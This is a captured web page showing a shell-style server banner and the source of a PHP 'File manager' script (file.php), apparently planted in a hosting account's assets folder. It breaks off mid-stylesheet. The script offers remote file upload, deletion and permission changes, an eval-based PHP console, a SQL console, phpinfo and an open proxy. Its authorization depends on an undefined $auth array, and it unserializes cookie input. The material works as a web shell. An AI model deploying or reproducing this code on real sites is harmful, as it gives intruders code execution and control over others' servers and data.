| Server IP : 46.105.57.169 / Your IP : 216.73.217.35 Web Server : Apache System : Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64 User : verseaumee ( 152031) PHP Version : 8.5.7 Disable Function : _dyuweyrj4,_dyuweyrj4r,dl MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/verseaumee/123click/assets/ |
Upload File : |
PK ! ��m�A �A file.phpnu �[��� <!doctype html>
<html>
</html>
<?php
/* PHP File manager ver 1.5 */
// Preparations
$starttime = explode(' ', microtime());
$starttime = $starttime[1] + $starttime[0];
$langs = array('en','ru','de','fr','uk');
$path = empty($_REQUEST['path']) ? $path = realpath('.') : realpath($_REQUEST['path']);
$path = str_replace('\\', '/', $path) . '/';
$main_path=str_replace('\\', '/',realpath('./'));
$phar_maybe = (version_compare(phpversion(),"5.3.0","<"))?true:false;
$msg_ntimes = ''; // service string
$default_language = 'ru';
$detect_lang = true;
$fm_version = 1.4;
// Little default config
$fm_default_config = array (
'make_directory' => true,
'new_file' => true,
'upload_file' => true,
'show_dir_size' => false, //if true, show directory size → maybe slow
'show_img' => true,
'show_php_ver' => true,
'show_php_ini' => false, // show path to current php.ini
'show_gt' => true, // show generation time
'enable_php_console' => true,
'enable_sql_console' => true,
'sql_server' => 'localhost',
'sql_username' => 'root',
'sql_password' => '',
'sql_db' => 'test_base',
'enable_proxy' => true,
'show_phpinfo' => true,
'show_xls' => true,
'fm_settings' => true,
'restore_time' => true,
'fm_restore_time' => false,
);
if (empty($_COOKIE['fm_config'])) $fm_config = $fm_default_config;
else $fm_config = unserialize($_COOKIE['fm_config']);
// Change language
if (isset($_POST['fm_lang'])) {
setcookie('fm_lang', $_POST['fm_lang'], time() + (86400 * $auth['days_authorization']));
$_COOKIE['fm_lang'] = $_POST['fm_lang'];
}
$language = $default_language;
// Detect browser language
if($detect_lang && !empty($_SERVER['HTTP_ACCEPT_LANGUAGE']) && empty($_COOKIE['fm_lang'])){
$lang_priority = explode(',', $_SERVER['HTTP_ACCEPT_LANGUAGE']);
if (!empty($lang_priority)){
foreach ($lang_priority as $lang_arr){
$lng = explode(';', $lang_arr);
$lng = $lng[0];
if(in_array($lng,$langs)){
$language = $lng;
break;
}
}
}
}
// Cookie language is primary for ever
$language = (empty($_COOKIE['fm_lang'])) ? $language : $_COOKIE['fm_lang'];
//translation
function __($text){
global $lang;
if (isset($lang[$text])) return $lang[$text];
else return $text;
};
//delete files and dirs recursively
function fm_del_files($file, $recursive = false) {
if($recursive && @is_dir($file)) {
$els = fm_scan_dir($file, '', '', true);
foreach ($els as $el) {
if($el != '.' && $el != '..'){
fm_del_files($file . '/' . $el, true);
}
}
}
if(@is_dir($file)) {
return rmdir($file);
} else {
return @unlink($file);
}
}
//file perms
function fm_rights_string($file, $if = false){
$perms = fileperms($file);
$info = '';
if(!$if){
if (($perms & 0xC000) == 0xC000) {
//Socket
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
//Symbolic Link
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
//Regular
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
//Block special
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
//Directory
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
//Character special
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
//FIFO pipe
$info = 'p';
} else {
//Unknown
$info = 'u';
}
}
//Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));
//Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));
//World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));
return $info;
}
function fm_convert_rights($mode) {
$mode = str_pad($mode,9,'-');
$trans = array('-'=>'0','r'=>'4','w'=>'2','x'=>'1');
$mode = strtr($mode,$trans);
$newmode = '0';
$owner = (int) $mode[0] + (int) $mode[1] + (int) $mode[2];
$group = (int) $mode[3] + (int) $mode[4] + (int) $mode[5];
$world = (int) $mode[6] + (int) $mode[7] + (int) $mode[8];
$newmode .= $owner . $group . $world;
return intval($newmode, 8);
}
function fm_chmod($file, $val, $rec = false) {
$res = @chmod(realpath($file), $val);
if(@is_dir($file) && $rec){
$els = fm_scan_dir($file);
foreach ($els as $el) {
$res = $res && fm_chmod($file . '/' . $el, $val, true);
}
}
return $res;
}
//load files
function fm_download($file_name) {
if (!empty($file_name)) {
if (file_exists($file_name)) {
header("Content-Disposition: attachment; filename=" . basename($file_name));
header("Content-Type: application/force-download");
header("Content-Type: application/octet-stream");
header("Content-Type: application/download");
header("Content-Description: File Transfer");
header("Content-Length: " . filesize($file_name));
flush(); // this doesn't really matter.
$fp = fopen($file_name, "r");
while (!feof($fp)) {
echo fread($fp, 65536);
flush(); // this is essential for large downloads
}
fclose($fp);
die();
} else {
header('HTTP/1.0 404 Not Found', true, 404);
header('Status: 404 Not Found');
die();
}
}
}
//show folder size
function fm_dir_size($f,$format=true) {
if($format) {
$size=fm_dir_size($f,false);
if($size<=1024) return $size.' bytes';
elseif($size<=1024*1024) return round($size/(1024),2).' Kb';
elseif($size<=1024*1024*1024) return round($size/(1024*1024),2).' Mb';
elseif($size<=1024*1024*1024*1024) return round($size/(1024*1024*1024),2).' Gb';
elseif($size<=1024*1024*1024*1024*1024) return round($size/(1024*1024*1024*1024),2).' Tb'; //:)))
else return round($size/(1024*1024*1024*1024*1024),2).' Pb'; // ;-)
} else {
if(is_file($f)) return filesize($f);
$size=0;
$dh=opendir($f);
while(($file=readdir($dh))!==false) {
if($file=='.' || $file=='..') continue;
if(is_file($f.'/'.$file)) $size+=filesize($f.'/'.$file);
else $size+=fm_dir_size($f.'/'.$file,false);
}
closedir($dh);
return $size+filesize($f);
}
}
//scan directory
function fm_scan_dir($directory, $exp = '', $type = 'all', $do_not_filter = false) {
$dir = $ndir = array();
if(!empty($exp)){
$exp = '/^' . str_replace('*', '(.*)', str_replace('.', '\\.', $exp)) . '$/';
}
if(!empty($type) && $type !== 'all'){
$func = 'is_' . $type;
}
if(@is_dir($directory)){
$fh = opendir($directory);
while (false !== ($filename = readdir($fh))) {
if(substr($filename, 0, 1) != '.' || $do_not_filter) {
if((empty($type) || $type == 'all' || $func($directory . '/' . $filename)) && (empty($exp) || preg_match($exp, $filename))){
$dir[] = $filename;
}
}
}
closedir($fh);
natsort($dir);
}
return $dir;
}
function fm_link($get,$link,$name,$title='') {
if (empty($title)) $title=$name.' '.basename($link);
return ' <a href="?'.$get.'='.base64_encode($link).'" title="'.$title.'">'.$name.'</a>';
}
function fm_arr_to_option($arr,$n,$sel=''){
foreach($arr as $v){
$b=$v[$n];
$res.='<option value="'.$b.'" '.($sel && $sel==$b?'selected':'').'>'.$b.'</option>';
}
return $res;
}
function fm_lang_form ($current='en'){
return '
<form name="change_lang" method="post" action="">
<select name="fm_lang" title="'.__('Language').'" onchange="document.forms[\'change_lang\'].submit()" >
<option value="en" '.($current=='en'?'selected="selected" ':'').'>'.__('English').'</option>
<option value="de" '.($current=='de'?'selected="selected" ':'').'>'.__('German').'</option>
<option value="ru" '.($current=='ru'?'selected="selected" ':'').'>'.__('Russian').'</option>
<option value="fr" '.($current=='fr'?'selected="selected" ':'').'>'.__('French').'</option>
<option value="uk" '.($current=='uk'?'selected="selected" ':'').'>'.__('Ukrainian').'</option>
</select>
</form>
';
}
function fm_root($dirname){
return ($dirname=='.' OR $dirname=='..');
}
function fm_php($string){
$display_errors=ini_get('display_errors');
ini_set('display_errors', '1');
ob_start();
eval(trim($string));
$text = ob_get_contents();
ob_end_clean();
ini_set('display_errors', $display_errors);
return $text;
}
//SHOW DATABASES
function fm_sql_connect(){
global $fm_config;
return new mysqli($fm_config['sql_server'], $fm_config['sql_username'], $fm_config['sql_password'], $fm_config['sql_db']);
}
function fm_sql($query){
global $fm_config;
$query=trim($query);
ob_start();
$connection = fm_sql_connect();
if ($connection->connect_error) {
ob_end_clean();
return $connection->connect_error;
}
$connection->set_charset('utf8');
$queried = mysqli_query($connection,$query);
if ($queried===false) {
ob_end_clean();
return mysqli_error($connection);
} else {
if(!empty($queried)){
while($row = mysqli_fetch_assoc($queried)) {
$query_result[]= $row;
}
}
$vdump=empty($query_result)?'':var_export($query_result,true);
ob_end_clean();
$connection->close();
return '<pre>'.stripslashes($vdump).'</pre>';
}
}
function fm_backup_tables($tables = '*', $full_backup = true) {
global $path;
$mysqldb = fm_sql_connect();
$delimiter = "; \n \n";
if($tables == '*') {
$tables = array();
$result = $mysqldb->query('SHOW TABLES');
while($row = mysqli_fetch_row($result)) {
$tables[] = $row[0];
}
} else {
$tables = is_array($tables) ? $tables : explode(',',$tables);
}
$return='';
foreach($tables as $table) {
$result = $mysqldb->query('SELECT * FROM '.$table);
$num_fields = mysqli_num_fields($result);
$return.= 'DROP TABLE IF EXISTS `'.$table.'`'.$delimiter;
$row2 = mysqli_fetch_row($mysqldb->query('SHOW CREATE TABLE '.$table));
$return.=$row2[1].$delimiter;
if ($full_backup) {
for ($i = 0; $i < $num_fields; $i++) {
while($row = mysqli_fetch_row($result)) {
$return.= 'INSERT INTO `'.$table.'` VALUES(';
for($j=0; $j<$num_fields; $j++) {
$row[$j] = addslashes($row[$j]);
$row[$j] = str_replace("\n","\\n",$row[$j]);
if (isset($row[$j])) { $return.= '"'.$row[$j].'"' ; } else { $return.= '""'; }
if ($j<($num_fields-1)) { $return.= ','; }
}
$return.= ')'.$delimiter;
}
}
} else {
$return = preg_replace("#AUTO_INCREMENT=[\d]+ #is", '', $return);
}
$return.="\n\n\n";
}
//save file
$file=gmdate("Y-m-d_H-i-s",time()).'.sql';
$handle = fopen($file,'w+');
fwrite($handle,$return);
fclose($handle);
$alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'?delete=' . $file . '&path=' . $path . '\'"';
return $file.': '.fm_link('download',$path.$file,__('Download'),__('Download').' '.$file).' <a href="#" title="' . __('Delete') . ' '. $file . '" ' . $alert . '>' . __('Delete') . '</a>';
}
function fm_restore_tables($sqlFileToExecute) {
$mysqldb = fm_sql_connect();
$delimiter = "; \n \n";
// Load and explode the sql file
$f = fopen($sqlFileToExecute,"r+");
$sqlFile = fread($f,filesize($sqlFileToExecute));
$sqlArray = explode($delimiter,$sqlFile);
//Process the sql file by statements
foreach ($sqlArray as $stmt) {
if (strlen($stmt)>3){
$result = $mysqldb->query($stmt);
if (!$result){
$sqlErrorCode = mysqli_errno($mysqldb->connection);
$sqlErrorText = mysqli_error($mysqldb->connection);
$sqlStmt = $stmt;
break;
}
}
}
if (empty($sqlErrorCode)) return __('Success').' — '.$sqlFileToExecute;
else return $sqlErrorText.'<br/>'.$stmt;
}
function fm_img_link($filename){
return './'.basename(__FILE__).'?img='.base64_encode($filename);
}
function fm_home_style(){
return '
input, input.fm_input {
text-indent: 2px;
}
input, textarea, select, input.fm_input {
color: black;
font: normal 8pt Verdana, Arial, Helvetica, sans-serif;
border-color: black;
background-color: #FCFCFC none !important;
border-radius: 0;
padding: 2px;
}
input.fm_input {
background: #FCFCFC none !important;
cursor: pointer;
}
.home {
background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAAgRQTFRF/f396Ojo////tT02zr+fw66Rtj432TEp3MXE2DAr3TYp1y4mtDw2/7BM/7BOqVpc/8l31jcqq6enwcHB2Tgi5jgqVpbFvra2nBAV/Pz82S0jnx0W3TUkqSgi4eHh4Tsre4wosz026uPjzGYd6Us3ynAydUBA5Kl3fm5eqZaW7ODgi2Vg+Pj4uY+EwLm5bY9U//7jfLtC+tOK3jcm/71u2jYo1UYh5aJl/seC3jEm12kmJrIA1jMm/9aU4Lh0e01BlIaE///dhMdC7IA//fTZ2c3MW6nN30wf95Vd4JdXoXVos8nE4efN/+63IJgSnYhl7F4csXt89GQUwL+/jl1c41Aq+fb2gmtI1rKa2C4kJaIA3jYrlTw5tj423jYn3cXE1zQoxMHBp1lZ3Dgmqiks/+mcjLK83jYkymMV3TYk//HM+u7Whmtr0odTpaOjfWJfrHpg/8Bs/7tW/7Ve+4U52DMm3MLBn4qLgNVM6MzB3lEflIuL/+jA///20LOzjXx8/7lbWpJG2C8k3TosJKMA1ywjopOR1zYp5Dspiay+yKNhqKSk8NW6/fjns7Oz2tnZuz887b+W3aRY/+ms4rCE3Tot7V85bKxjuEA3w45Vh5uhq6am4cFxgZZW/9qIuwgKy0sW+ujT4TQntz423C8i3zUj/+Kw/a5d6UMxuL6wzDEr////cqJQfAAAAKx0Uk5T////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////AAWVFbEAAAAZdEVYdFNvZnR3YXJlAEFkb2JlIEltYWdlUmVhZHlxyWU8AAAA2UlEQVQoU2NYjQYYsAiE8U9YzDYjVpGZRxMiECitMrVZvoMrTlQ2ESRQJ2FVwinYbmqTULoohnE1g1aKGS/fNMtk40yZ9KVLQhgYkuY7NxQvXyHVFNnKzR69qpxBPMez0ETAQyTUvSogaIFaPcNqV/M5dha2Rl2Timb6Z+QBDY1XN/Sbu8xFLG3eLDfl2UABjilO1o012Z3ek1lZVIWAAmUTK6L0s3pX+jj6puZ2AwWUvBRaphswMdUujCiwDwa5VEdPI7ynUlc7v1qYURLquf42hz45CBPDtwACrm+RDcxJYAAAAABJRU5ErkJggg==");
background-repeat: no-repeat;
}';
}
function fm_config_checkbox_row($name,$value) {
global $fm_config;
return '<tr><td class="row1"><input id="fm_config_'.$value.'" name="fm_config['.$value.']" value="1" '.(empty($fm_config[$value])?'':'checked="true"').' type="checkbox"></td><td class="row2 whole"><label for="fm_config_'.$value.'">'.$name.'</td></tr>';
}
function fm_protocol() {
if (isset($_SERVER['HTTP_SCHEME'])) return $_SERVER['HTTP_SCHEME'].'://';
if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') return 'https://';
if (isset($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == 443) return 'https://';
if (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') return 'https://';
return 'http://';
}
function fm_site_url() {
return fm_protocol().$_SERVER['HTTP_HOST'];
}
function fm_url($full=false) {
$host=$full?fm_site_url():'.';
return $host.'/'.basename(__FILE__);
}
function fm_home($full=false){
return ' <a href="'.fm_url($full).'" title="'.__('Home').'"><span class="home"> </span></a>';
}
function fm_run_input($lng) {
global $fm_config;
$return = !empty($fm_config['enable_'.$lng.'_console']) ?
'
<form method="post" action="'.fm_url().'" style="display:inline">
<input type="submit" name="'.$lng.'run" value="'.strtoupper($lng).' '.__('Console').'">
</form>
' : '';
return $return;
}
function fm_url_proxy($matches) {
$link = str_replace('&','&',$matches[2]);
$url = isset($_GET['url'])?$_GET['url']:'';
$parse_url = parse_url($url);
$host = $parse_url['scheme'].'://'.$parse_url['host'].'/';
if (substr($link,0,2)=='//') {
$link = substr_replace($link,fm_protocol(),0,2);
} elseif (substr($link,0,1)=='/') {
$link = substr_replace($link,$host,0,1);
} elseif (substr($link,0,2)=='./') {
$link = substr_replace($link,$host,0,2);
} elseif (substr($link,0,4)=='http') {
//alles machen wunderschon
} else {
$link = $host.$link;
}
if ($matches[1]=='href' && !strripos($link, 'css')) {
$base = fm_site_url().'/'.basename(__FILE__);
$baseq = $base.'?proxy=true&url=';
$link = $baseq.urlencode($link);
} elseif (strripos($link, 'css')){
//как-то тоже подменять надо
}
return $matches[1].'="'.$link.'"';
}
function fm_tpl_form($lng_tpl) {
global ${$lng_tpl.'_templates'};
$tpl_arr = json_decode(${$lng_tpl.'_templates'},true);
$str = '';
foreach ($tpl_arr as $ktpl=>$vtpl) {
$str .= '<tr><td class="row1"><input name="'.$lng_tpl.'_name[]" value="'.$ktpl.'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_value[]" cols="55" rows="5" class="textarea_input">'.$vtpl.'</textarea> <input name="del_'.rand().'" type="button" onClick="this.parentNode.parentNode.remove();" value="'.__('Delete').'"/></td></tr>';
}
return '
<table>
<tr><th colspan="2">'.strtoupper($lng_tpl).' '.__('templates').' '.fm_run_input($lng_tpl).'</th></tr>
<form method="post" action="">
<input type="hidden" value="'.$lng_tpl.'" name="tpl_edited">
<tr><td class="row1">'.__('Name').'</td><td class="row2 whole">'.__('Value').'</td></tr>
'.$str.'
<tr><td colspan="2" class="row3"><input name="res" type="button" onClick="document.location.href = \''.fm_url().'?fm_settings=true\';" value="'.__('Reset').'"/> <input type="submit" value="'.__('Save').'" ></td></tr>
</form>
<form method="post" action="">
<input type="hidden" value="'.$lng_tpl.'" name="tpl_edited">
<tr><td class="row1"><input name="'.$lng_tpl.'_new_name" value="" placeholder="'.__('New').' '.__('Name').'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_new_value" cols="55" rows="5" class="textarea_input" placeholder="'.__('New').' '.__('Value').'"></textarea></td></tr>
<tr><td colspan="2" class="row3"><input type="submit" value="'.__('Add').'" ></td></tr>
</form>
</table>
';
}
function find_text_in_files($dir, $mask, $text) {
$results = array();
if ($handle = opendir($dir)) {
while (false !== ($entry = readdir($handle))) {
if ($entry != "." && $entry != "..") {
$path = $dir . "/" . $entry;
if (is_dir($path)) {
$results = array_merge($results, find_text_in_files($path, $mask, $text));
} else {
if (fnmatch($mask, $entry)) {
$contents = file_get_contents($path);
if (strpos($contents, $text) !== false) {
$results[] = str_replace('//', '/', $path);
}
}
}
}
}
closedir($handle);
}
return $results;
}
/* End Functions */
// authorization
if ($auth['authorize']) {
if (isset($_POST['login']) && isset($_POST['password'])){
if (($_POST['login']==$auth['login']) && ($_POST['password']==$auth['password'])) {
setcookie($auth['cookie_name'], $auth['login'].'|'.md5($auth['password']), time() + (86400 * $auth['days_authorization']));
$_COOKIE[$auth['cookie_name']]=$auth['login'].'|'.md5($auth['password']);
}
}
if (!isset($_COOKIE[$auth['cookie_name']]) OR ($_COOKIE[$auth['cookie_name']]!=$auth['login'].'|'.md5($auth['password']))) {
echo '
';
die();
}
if (isset($_POST['quit'])) {
unset($_COOKIE[$auth['cookie_name']]);
setcookie($auth['cookie_name'], '', time() - (86400 * $auth['days_authorization']));
header('Location: '.fm_site_url().$_SERVER['REQUEST_URI']);
}
}
// Change config
if (isset($_GET['fm_settings'])) {
if (isset($_GET['fm_config_delete'])) {
unset($_COOKIE['fm_config']);
setcookie('fm_config', '', time() - (86400 * $auth['days_authorization']));
header('Location: '.fm_url().'?fm_settings=true');
exit(0);
} elseif (isset($_POST['fm_config'])) {
$fm_config = $_POST['fm_config'];
setcookie('fm_config', serialize($fm_config), time() + (86400 * $auth['days_authorization']));
$_COOKIE['fm_config'] = serialize($fm_config);
$msg_ntimes = __('Settings').' '.__('done');
} elseif (isset($_POST['fm_login'])) {
if (empty($_POST['fm_login']['authorize'])) $_POST['fm_login'] = array('authorize' => '0') + $_POST['fm_login'];
$fm_login = json_encode($_POST['fm_login']);
$fgc = file_get_contents(__FILE__);
$search = preg_match('#authorization[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches);
if (!empty($matches[1])) {
$filemtime = filemtime(__FILE__);
$replace = str_replace('{"'.$matches[1].'"}',$fm_login,$fgc);
if (file_put_contents(__FILE__, $replace)) {
$msg_ntimes .= __('File updated');
if ($_POST['fm_login']['login'] != $auth['login']) $msg_ntimes .= ' '.__('Login').': '.$_POST['fm_login']['login'];
if ($_POST['fm_login']['password'] != $auth['password']) $msg_ntimes .= ' '.__('Password').': '.$_POST['fm_login']['password'];
$auth = $_POST['fm_login'];
}
else $msg_ntimes .= __('Error occurred');
if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime);
}
} elseif (isset($_POST['tpl_edited'])) {
$lng_tpl = $_POST['tpl_edited'];
if (!empty($_POST[$lng_tpl.'_name'])) {
$fm_php = json_encode(array_combine($_POST[$lng_tpl.'_name'],$_POST[$lng_tpl.'_value']),JSON_HEX_APOS);
} elseif (!empty($_POST[$lng_tpl.'_new_name'])) {
$fm_php = json_encode(json_decode(${$lng_tpl.'_templates'},true)+array($_POST[$lng_tpl.'_new_name']=>$_POST[$lng_tpl.'_new_value']),JSON_HEX_APOS);
}
if (!empty($fm_php)) {
$fgc = file_get_contents(__FILE__);
$search = preg_match('#'.$lng_tpl.'_templates[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches);
if (!empty($matches[1])) {
$filemtime = filemtime(__FILE__);
$replace = str_replace('{"'.$matches[1].'"}',$fm_php,$fgc);
if (file_put_contents(__FILE__, $replace)) {
${$lng_tpl.'_templates'} = $fm_php;
$msg_ntimes .= __('File updated');
} else $msg_ntimes .= __('Error occurred');
if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime);
}
} else $msg_ntimes .= __('Error occurred');
}
}
// Just show image
if (isset($_GET['img'])) {
$file=base64_decode($_GET['img']);
if ($info=getimagesize($file)){
switch ($info[2]){ //1=GIF, 2=JPG, 3=PNG, 4=SWF, 5=PSD, 6=BMP
case 1: $ext='gif'; break;
case 2: $ext='jpeg'; break;
case 3: $ext='png'; break;
case 6: $ext='bmp'; break;
default: die();
}
header("Content-type: image/$ext");
echo file_get_contents($file);
die();
}
}
// Just download file
if (isset($_GET['download'])) {
$file=base64_decode($_GET['download']);
fm_download($file);
}
// Just show info
if (isset($_GET['phpinfo'])) {
phpinfo();
die();
}
// Mini proxy, many bugs!
if (isset($_GET['proxy']) && (!empty($fm_config['enable_proxy']))) {
$url = isset($_GET['url'])?urldecode($_GET['url']):'';
$proxy_form = '
<div style="position:relative;z-index:100500;background: linear-gradient(to bottom, #e4f5fc 0%,#bfe8f9 50%,#9fd8ef 51%,#2ab0ed 100%);">
<form action="" method="GET">
<input type="hidden" name="proxy" value="true">
'.fm_home().' <a href="'.$url.'" target="_blank">Url</a>: <input type="text" name="url" value="'.$url.'" size="55">
<input type="submit" value="'.__('Show').'" class="fm_input">
</form>
</div>
';
if ($url) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_USERAGENT, 'Den1xxx test proxy');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,0);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_REFERER, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
$result = curl_exec($ch);
curl_close($ch);
//$result = preg_replace('#(src)=["\'][http://]?([^:]*)["\']#Ui', '\\1="'.$url.'/\\2"', $result);
$result = preg_replace_callback('#(href|src)=["\'][http://]?([^:]*)["\']#Ui', 'fm_url_proxy', $result);
$result = preg_replace('%(<body.*?>)%i', '$1'.'<style>'.fm_home_style().'</style>'.$proxy_form, $result);
echo $result;
die();
}
}
?>
<!doctype html>
<html>
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<title>Bar-KnOW</title>
<style>
body {
background-color: white;
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 8pt;
margin: 0px;
}
a:link, a:active, a:visited { color: #006699; text-decoration: none; }
a:hover { color: #DD6900; text-decoration: underline; }
a.th:link { color: #FFA34F; text-decoration: none; }
a.th:active { color: #FFA34F; text-decoration: none; }
a.th:visited { color: #FFA34F; text-decoration: none; }
a.th:hover { color: #FFA34F; text-decoration: underline; }
table.bg {
background-color: #ACBBC6
}
th, td {
font: normal 8pt Verdana, Arial, Helvetica, sans-serif;
padding: 3px;
}
th {
height: 25px;
background-color: #006699;
color: #FFA34F;
font-weight: bold;
font-size: 11px;
}
.row1 {
background-color: #EFEFEF;
}
.row2 {
background-color: #DEE3E7;
}
.row3 {
background-color: #D1D7DC;
padding: 5px;
}
tr.row1:hover {
background-color: #F3FCFC;
}
tr.row2:hover {
background-color: #F0F6F6;
}
.whole {
width: 100%;
}
.all tbody td:first-child{width:100%;}
textarea {
font: 9pt 'Courier New', courier;
line-height: 125%;
padding: 5px;
}
.textarea_input {
height: 1em;
}
.textarea_input:focus {
height: auto;
}
input[type=submit]{
background: #FCFCFC none !important;
cursor: pointer;
}
.folder {
background-image: url("data:image/png;base64,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